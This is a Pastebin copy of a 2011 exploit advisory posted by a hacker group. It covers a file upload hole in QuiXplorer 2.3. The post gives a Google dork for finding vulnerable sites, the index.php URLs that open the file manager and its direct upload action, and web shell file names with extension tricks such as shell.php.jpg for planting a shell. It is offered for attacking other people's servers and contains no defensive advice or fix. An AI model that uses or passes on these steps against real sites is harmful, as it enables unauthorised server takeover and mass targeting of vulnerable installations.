Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
- # Google Dork: "QuiXplorer 2.3 - the QuiX project"
- # Date: 13/11/2011
- # Author: PCA & krhr_krhr and
- # Software Link: http://quixplorer.sourceforge.net/
- # Version: QuiXplorer 2.3
- # Tested on: linux ,windows
- # CVE :
- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Vulnerablity
- http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
- http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- after Going to this you will saw a file manager
- you can upload your files here
- find this icons in page and click on last, its upload option ::
- You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
- after index.php?
- Quote:
- example : http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
- Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- - anything support file
- click On you file For view
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PCA PERUVIAN CYBER ARMY & krhr_krhr and (HF)
- PCA TEAM :
- -rAtoN
- -Chipd3bios
- -jardha
- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement